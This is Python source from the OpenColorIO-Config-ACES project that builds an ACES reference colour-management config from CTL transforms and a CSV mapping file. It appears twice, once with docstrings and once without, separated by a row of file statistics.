def ctl_transform_to_look(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* look for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.look_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* look.
"""
name = ctl_transform_to_look_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
look_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'description':
description,
}
settings.update(kwargs)
look = look_factory(**settings)
return look
@required('OpenColorIO')
def create_builtin_transform(style):
"""
Creates an *OpenColorIO* builtin transform for given style.
If the style does not exist, a placeholder transform is used in place
of the builtin transform.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
Returns
-------
BuiltinTransform
*OpenColorIO* builtin transform for given style.
"""
import PyOpenColorIO as ocio
builtin_transform = ocio.BuiltinTransform()
try:
builtin_transform.setStyle(style)
except ocio.Exception:
logging.warning(f'{style} style is not defined, '
f'using a placeholder "FileTransform" instead!')
builtin_transform = ocio.FileTransform()
builtin_transform.setSrc(style)
return builtin_transform
@required('OpenColorIO')
def style_to_view_transform(style,
ctl_transforms,
describe=ColorspaceDescriptionStyle.LONG_UNION):
"""
Creates an *OpenColorIO* view transform for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
ctl_transforms : array_like
Array of :class:`opencolorio_config_aces.config.reference.CTLTransform`
class instances corresponding to the given style.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Returns
-------
ViewTransform
*OpenColorIO* view transform for given style.
"""
import PyOpenColorIO as ocio
name = beautify_view_transform_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
aces_transform_ids, aces_descriptions = zip(
*[(ctl_transform.aces_transform_id.aces_transform_id,
ctl_transform.description)
for ctl_transform in ctl_transforms])
if len(description) > 0:
description.append('')
if describe in (ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.extend([
f'ACEStransformID: {aces_transform_id}'
for aces_transform_id in aces_transform_ids
])
else:
description.append(
f'CTL Transform'
f'{"s" if len(aces_transform_ids) >= 2 else ""}')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'\n{"-" * 80}\n\n'.join([
(f'{aces_descriptions[i]}\n\n'
f'ACEStransformID: {aces_transform_id}\n')
for i, aces_transform_id in enumerate(aces_transform_ids)
]))
description = '\n'.join(description)
view_transform = view_transform_factory(
name, from_reference=builtin_transform, description=description)
return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
"""
Creates an *OpenColorIO* display colorspace for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* display colorspace for given style.
"""
import PyOpenColorIO as ocio
kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)
name = beautify_display_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
description = '\n'.join(description)
settings = {
'name': name,
'family': ACES_CONFIG_DISPLAY_FAMILY,
'description': description,
'from_reference': builtin_transform,
'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
@required('OpenColorIO')
def generate_config_aces(
config_name=None,
validate=True,
describe=ColorspaceDescriptionStyle.SHORT_UNION,
config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
analytical=True,
additional_data=False):
"""
Generates the *aces-dev* reference implementation *OpenColorIO* Config
using the *Mapping* method.
The Config generation is constrained by a *CSV* file exported from the
*Reference Config - Mapping* sheet from a
`Google Sheets file <https://docs.google.com/spreadsheets/d/\
1SXPt-USy3HlV2G2qAvh9zit6ZCINDOlfKT07yXJdWLg>`__. The *Google Sheets* file
was originally authored using the output of the *aces-dev* conversion graph
to support the discussions of the *OpenColorIO* *Working Group* on the
design of the *aces-dev* reference implementation *OpenColorIO* Config.
The resulting mapping is the outcome of those discussions and leverages the
new *OpenColorIO 2* display architecture while factoring many transforms.
Parameters
----------
config_name : unicode, optional
*OpenColorIO* config file name, if given the config will be written to
disk.
validate : bool, optional
Whether to validate the config.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
config_mapping_file_path : unicode, optional
Path to the *CSV* mapping file used by the *Mapping* method.
analytical : bool, optional
Whether to generate *OpenColorIO* transform families that analytically
match the given *ACES* *CTL* transform, i.e. true to the *aces-dev*
reference but not necessarily user friendly.
additional_data : bool, optional
Whether to return additional data.
Returns
-------
Config or tuple
*OpenColorIO* config or tuple of *OpenColorIO* config,
:class:`opencolorio_config_aces.ConfigData` class instance and dict of
*OpenColorIO* colorspaces and
:class:`opencolorio_config_aces.config.reference.CTLTransform` class
instances.
"""
import PyOpenColorIO as ocio
ctl_transforms = unclassify_ctl_transforms(
classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
builtin_transforms = [
builtin for builtin in ocio.BuiltinTransformRegistry()
]
config_mapping = defaultdict(list)
with open(config_mapping_file_path) as csv_file:
dict_reader = csv.DictReader(
csv_file,
delimiter=',',
fieldnames=[
'ordering',
'aces_transform_id',
'builtin_transform_style',
'linked_display_colorspace_style',
'interface',
'encoding',
'categories',
])
# Skipping the first header line.
next(dict_reader)
for transform_data in dict_reader:
# Checking whether the "BuiltinTransform" style exists.
style = transform_data['builtin_transform_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Checking whether the linked "DisplayColorspace"
# "BuiltinTransform" style exists.
style = transform_data['linked_display_colorspace_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Finding the "CTLTransform" class instance that matches given
# "ACEStransformID", if it does not exist, there is a critical
# mismatch in the mapping with *aces-dev*.
aces_transform_id = transform_data['aces_transform_id']
filtered_ctl_transforms = [
ctl_transform for ctl_transform in ctl_transforms
if ctl_transform.aces_transform_id.aces_transform_id ==
aces_transform_id
]
ctl_transform = next(iter(filtered_ctl_transforms), None)
assert ctl_transform is not None, (
f'"aces-dev" has no transform with "{aces_transform_id}" '
f'ACEStransformID, please cross-check the '
f'"{config_mapping_file_path}" config mapping file and '
f'the "aces-dev" "CTL" transforms!')
transform_data['ctl_transform'] = ctl_transform
config_mapping[transform_data['builtin_transform_style']].append(
transform_data)
colorspaces = []
looks = []
displays, display_names = [], []
view_transforms, view_transform_names = [], []
shared_views = []
aces_family_prefix = 'CSC' if analytical else 'ACES'
scene_reference_colorspace = colorspace_factory(
f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
'ACES',
description=(
'The "Academy Color Encoding System" reference colorspace.'),
encoding='scene-linear')
display_reference_colorspace = colorspace_factory(
'CIE-XYZ-D65',
description='The "CIE XYZ (D65)" display connection colorspace.',
reference_space=ocio.REFERENCE_SPACE_DISPLAY)
raw_colorspace = colorspace_factory(
'Utility - Raw',
'Utility',
description='The utility "Raw" colorspace.',
is_data=True)
colorspaces += [
scene_reference_colorspace,
display_reference_colorspace,
raw_colorspace,
]
for style, transforms_data in config_mapping.items():
if transforms_data[0]['interface'] == 'ViewTransform':
view_transform = style_to_view_transform(style, [
transform_data['ctl_transform']
for transform_data in transforms_data
], describe)
view_transforms.append(view_transform)
view_transform_name = view_transform.getName()
view_transform_names.append(view_transform_name)
for transform_data in transforms_data:
display_style = transform_data[
'linked_display_colorspace_style']
display = style_to_display_colorspace(
display_style,
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
display_name = display.getName()
if display_name not in display_names:
displays.append(display)
display_names.append(display_name)
shared_views.append({
'display': display_name,
'view': view_transform_name,
'view_transform': view_transform_name,
})
else:
for transform_data in transforms_data:
ctl_transform = transform_data['ctl_transform']
if transform_data['interface'] == 'Look':
look = ctl_transform_to_look(
ctl_transform,
describe,
analytical=analytical,
forward_transform=create_builtin_transform(style),
process_space=scene_reference_colorspace.getName(),
)
looks.append(look)
else:
colorspace = ctl_transform_to_colorspace(
ctl_transform,
describe,
analytical=analytical,
to_reference=create_builtin_transform(style),
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
colorspaces.append(colorspace)
untonemapped_view_transform = view_transform_factory(
'Un-tone-mapped',
from_reference=ocio.BuiltinTransform(
'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
)
untonemapped_view_transform_name = untonemapped_view_transform.getName()
for display in display_names:
shared_views.append({
'display': display,
'view': untonemapped_view_transform_name,
'view_transform': untonemapped_view_transform_name,
})
data = ConfigData(
description=(
f'The "Academy Color Encoding System" (ACES) "Reference Config".'
f'\n\n'
f'This "OpenColorIO" config is a strict and quasi-analytical '
f'implementation of "aces-dev" and is designed as a reference for '
f'software developers. It is not a replacement for the previous '
f'"ACES" configs nor the "ACES Studio Config".'
f'\n\n'
f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
roles={
ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_DATA: 'Utility - Raw',
ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_DISPLAY:
display_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
},
colorspaces=colorspaces + displays,
looks=looks,
view_transforms=view_transforms + [untonemapped_view_transform],
shared_views=shared_views,
views=shared_views + [{
'display': display,
'view': 'Raw',
'colorspace': 'Utility - Raw'
} for display in display_names],
active_displays=display_names,
active_views=view_transform_names + ['Raw'],
file_rules=[{
'name': 'Default',
'colorspace': scene_reference_colorspace.getName()
}],
inactive_colorspaces=['CIE-XYZ-D65'],
default_view_transform=untonemapped_view_transform.getName(),
profile_version=2)
config = generate_config(data, config_name, validate)
if additional_data:
return config, data
else:
return config
if __name__ == '__main__':
import os
import opencolorio_config_aces
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
'build')
if not os.path.exists(build_directory):
os.makedirs(build_directory)
config, data = generate_config_aces(
config_name=os.path.join(build_directory,
'config-aces-reference.ocio'),
analytical=False,
additional_data=True)
| 31.766234 | 79 | 0.634096 |
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
class ColorspaceDescriptionStyle(Flag):
NONE = auto()
ACES = auto()
OPENCOLORIO = auto()
SHORT = auto()
LONG = auto()
SHORT_UNION = ACES | OPENCOLORIO | SHORT
LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
for pattern, substitution in patterns.items():
name = re.sub(pattern, substitution, name)
return name.strip()
def beautify_colorspace_name(name):
return beautify_name(name, COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
def beautify_look_name(name):
return beautify_name(name, LOOK_NAME_SUBSTITUTION_PATTERNS)
def beautify_transform_family(name):
return beautify_name(name, TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS)
def beautify_view_transform_name(name):
basename, version = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[
-1].split('_')
tokens = basename.split('-')
family, genus = (['-'.join(tokens[:2]), '-'.join(tokens[2:])]
if len(tokens) > 2 else [basename, None])
family = beautify_name(family, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
genus = (beautify_name(genus, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
if genus is not None else genus)
return (f'Output - {family} ({genus}) - ACES {version}'
if genus is not None else f'Output - {family} - ACES {version}')
def beautify_display_name(name):
basename = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
name = beautify_name(basename, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
return f'Display - {name}'
def ctl_transform_to_colorspace_name(ctl_transform):
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
if analytical:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
family = 'CSC'
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
else:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
if re.match('ACES|ADX', ctl_transform.name):
family = 'ACES'
else:
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
factory=colorspace_factory,
**kwargs):
import PyOpenColorIO as ocio
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
forward, inverse = ([
'to_reference',
'from_reference',
] if factory is colorspace_factory else [
'forward_transform',
'inverse_transform',
])
transforms = [
transform for transform in (kwargs.get(forward),
kwargs.get(inverse))
if transform is not None
]
transform = next(iter(transforms), None)
if isinstance(transform, ocio.BuiltinTransform):
description.append(transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
if len(description) > 0:
description.append('')
aces_transform_id = (
ctl_transform.aces_transform_id.aces_transform_id)
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.append(f'ACEStransformID: {aces_transform_id}')
else:
description.append('CTL Transform')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'{ctl_transform.description}\n')
description.append(f'ACEStransformID: {aces_transform_id}')
description = '\n'.join(description)
return description
def ctl_transform_to_colorspace(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
name = ctl_transform_to_colorspace_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
colorspace_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'family':
family,
'description':
description,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
def ctl_transform_to_look(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
name = ctl_transform_to_look_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
look_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'description':
description,
}
settings.update(kwargs)
look = look_factory(**settings)
return look
@required('OpenColorIO')
def create_builtin_transform(style):
import PyOpenColorIO as ocio
builtin_transform = ocio.BuiltinTransform()
try:
builtin_transform.setStyle(style)
except ocio.Exception:
logging.warning(f'{style} style is not defined, '
f'using a placeholder "FileTransform" instead!')
builtin_transform = ocio.FileTransform()
builtin_transform.setSrc(style)
return builtin_transform
@required('OpenColorIO')
def style_to_view_transform(style,
ctl_transforms,
describe=ColorspaceDescriptionStyle.LONG_UNION):
import PyOpenColorIO as ocio
name = beautify_view_transform_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
aces_transform_ids, aces_descriptions = zip(
*[(ctl_transform.aces_transform_id.aces_transform_id,
ctl_transform.description)
for ctl_transform in ctl_transforms])
if len(description) > 0:
description.append('')
if describe in (ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.extend([
f'ACEStransformID: {aces_transform_id}'
for aces_transform_id in aces_transform_ids
])
else:
description.append(
f'CTL Transform'
f'{"s" if len(aces_transform_ids) >= 2 else ""}')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'\n{"-" * 80}\n\n'.join([
(f'{aces_descriptions[i]}\n\n'
f'ACEStransformID: {aces_transform_id}\n')
for i, aces_transform_id in enumerate(aces_transform_ids)
]))
description = '\n'.join(description)
view_transform = view_transform_factory(
name, from_reference=builtin_transform, description=description)
return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
import PyOpenColorIO as ocio
kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)
name = beautify_display_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
description = '\n'.join(description)
settings = {
'name': name,
'family': ACES_CONFIG_DISPLAY_FAMILY,
'description': description,
'from_reference': builtin_transform,
'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
@required('OpenColorIO')
def generate_config_aces(
config_name=None,
validate=True,
describe=ColorspaceDescriptionStyle.SHORT_UNION,
config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
analytical=True,
additional_data=False):
import PyOpenColorIO as ocio
ctl_transforms = unclassify_ctl_transforms(
classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
builtin_transforms = [
builtin for builtin in ocio.BuiltinTransformRegistry()
]
config_mapping = defaultdict(list)
with open(config_mapping_file_path) as csv_file:
dict_reader = csv.DictReader(
csv_file,
delimiter=',',
fieldnames=[
'ordering',
'aces_transform_id',
'builtin_transform_style',
'linked_display_colorspace_style',
'interface',
'encoding',
'categories',
])
next(dict_reader)
for transform_data in dict_reader:
style = transform_data['builtin_transform_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
style = transform_data['linked_display_colorspace_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
aces_transform_id = transform_data['aces_transform_id']
filtered_ctl_transforms = [
ctl_transform for ctl_transform in ctl_transforms
if ctl_transform.aces_transform_id.aces_transform_id ==
aces_transform_id
]
ctl_transform = next(iter(filtered_ctl_transforms), None)
assert ctl_transform is not None, (
f'"aces-dev" has no transform with "{aces_transform_id}" '
f'ACEStransformID, please cross-check the '
f'"{config_mapping_file_path}" config mapping file and '
f'the "aces-dev" "CTL" transforms!')
transform_data['ctl_transform'] = ctl_transform
config_mapping[transform_data['builtin_transform_style']].append(
transform_data)
colorspaces = []
looks = []
displays, display_names = [], []
view_transforms, view_transform_names = [], []
shared_views = []
aces_family_prefix = 'CSC' if analytical else 'ACES'
scene_reference_colorspace = colorspace_factory(
f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
'ACES',
description=(
'The "Academy Color Encoding System" reference colorspace.'),
encoding='scene-linear')
display_reference_colorspace = colorspace_factory(
'CIE-XYZ-D65',
description='The "CIE XYZ (D65)" display connection colorspace.',
reference_space=ocio.REFERENCE_SPACE_DISPLAY)
raw_colorspace = colorspace_factory(
'Utility - Raw',
'Utility',
description='The utility "Raw" colorspace.',
is_data=True)
colorspaces += [
scene_reference_colorspace,
display_reference_colorspace,
raw_colorspace,
]
for style, transforms_data in config_mapping.items():
if transforms_data[0]['interface'] == 'ViewTransform':
view_transform = style_to_view_transform(style, [
transform_data['ctl_transform']
for transform_data in transforms_data
], describe)
view_transforms.append(view_transform)
view_transform_name = view_transform.getName()
view_transform_names.append(view_transform_name)
for transform_data in transforms_data:
display_style = transform_data[
'linked_display_colorspace_style']
display = style_to_display_colorspace(
display_style,
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
display_name = display.getName()
if display_name not in display_names:
displays.append(display)
display_names.append(display_name)
shared_views.append({
'display': display_name,
'view': view_transform_name,
'view_transform': view_transform_name,
})
else:
for transform_data in transforms_data:
ctl_transform = transform_data['ctl_transform']
if transform_data['interface'] == 'Look':
look = ctl_transform_to_look(
ctl_transform,
describe,
analytical=analytical,
forward_transform=create_builtin_transform(style),
process_space=scene_reference_colorspace.getName(),
)
looks.append(look)
else:
colorspace = ctl_transform_to_colorspace(
ctl_transform,
describe,
analytical=analytical,
to_reference=create_builtin_transform(style),
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
colorspaces.append(colorspace)
untonemapped_view_transform = view_transform_factory(
'Un-tone-mapped',
from_reference=ocio.BuiltinTransform(
'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
)
untonemapped_view_transform_name = untonemapped_view_transform.getName()
for display in display_names:
shared_views.append({
'display': display,
'view': untonemapped_view_transform_name,
'view_transform': untonemapped_view_transform_name,
})
data = ConfigData(
description=(
f'The "Academy Color Encoding System" (ACES) "Reference Config".'
f'\n\n'
f'This "OpenColorIO" config is a strict and quasi-analytical '
f'implementation of "aces-dev" and is designed as a reference for '
f'software developers. It is not a replacement for the previous '
f'"ACES" configs nor the "ACES Studio Config".'
f'\n\n'
f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
roles={
ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_DATA: 'Utility - Raw',
ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_DISPLAY:
display_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
